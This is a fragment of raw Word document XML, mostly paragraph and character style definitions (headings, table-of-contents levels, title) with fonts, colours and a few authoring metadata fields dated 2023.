    <w:rsid w:val="00EC4A31"/>
    <w:rsid w:val="00F221C1"/>
    <w:rsid w:val="00F5475D"/>
    <w:rsid w:val="00F82DD9"/>
    <w:rsid w:val="00FB206C"/>
    <w:rsid w:val="00FB4877"/>
    <w:rsid w:val="00FC1BB5"/>
    <w:rsid w:val="00FE30C9"/>
    <w:rsid w:val="00FE3BE1"/>
    <w:rsid w:val="11542622"/>
    <w:rsid w:val="52640E09"/>
    <w:rsid w:val="68CB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ABE723E-0619-4CB7-BEB9-4C68EB6C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0" w:line="259" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Frutiger LT Com 55 Roman" w:eastAsia="宋体" w:hAnsi="Frutiger LT Com 55 Roman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400" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Frutiger LT Com 45 Light" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Frutiger LT Com 45 Light" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="003764"/>
      <w:sz w:val="40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320" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Frutiger LT Com 45 Light" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Frutiger LT Com 45 Light" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="003764"/>
      <w:sz w:val="32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00" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Frutiger LT Com 45 Light" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Frutiger LT Com 45 Light" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="003764"/>
      <w:sz w:val="22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qFormat/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="400"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:szCs w:val="20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spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="20">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:smallCaps/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="Char1"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:after="200" w:line="1000" w:lineRule="exact"/>
      <w:ind w:left="-142"/>
      <w:contextualSpacing/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman (Headings CS)"/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="92"/>
      <w:szCs w:val="56"/>
      <w:lang w:val="en-AU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="a6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Frutiger LT Com 45 Light" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Frutiger LT Com 45 Light" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="003764"/>
      <w:kern w:val="0"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="32"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="2Char">
    <w:name w:val="标题 2 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Frutiger LT Com 45 Light" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Frutiger LT Com 45 Light" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="003764"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="26"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="3Char">
    <w:name w:val="标题 3 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Frutiger LT Com 45 Light" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Frutiger LT Com 45 Light" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="003764"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="标题 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Frutiger LT Com 55 Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Frutiger LT Com 55 Roman" w:cs="Times New Roman (Headings CS)"/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="92"/>
      <w:szCs w:val="56"/>
      <w:lang w:val="en-AU" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid1">
    <w:name w:val="Table Grid1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widowControl w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="6Char">
    <w:name w:val="标题 6 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBid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5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 Nan</dc:creator>
  <cp:lastModifiedBy>CS</cp:lastModifiedBy>
  <cp:revision>60</cp:revision>
  <cp:lastPrinted>2023-04-15T09:12:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-12T10:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-17T08:37:00Z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C23E5918A04C48E8A66F9AEA9381F159_12</vt:lpwstr>
  </property>
</Properties>
</file>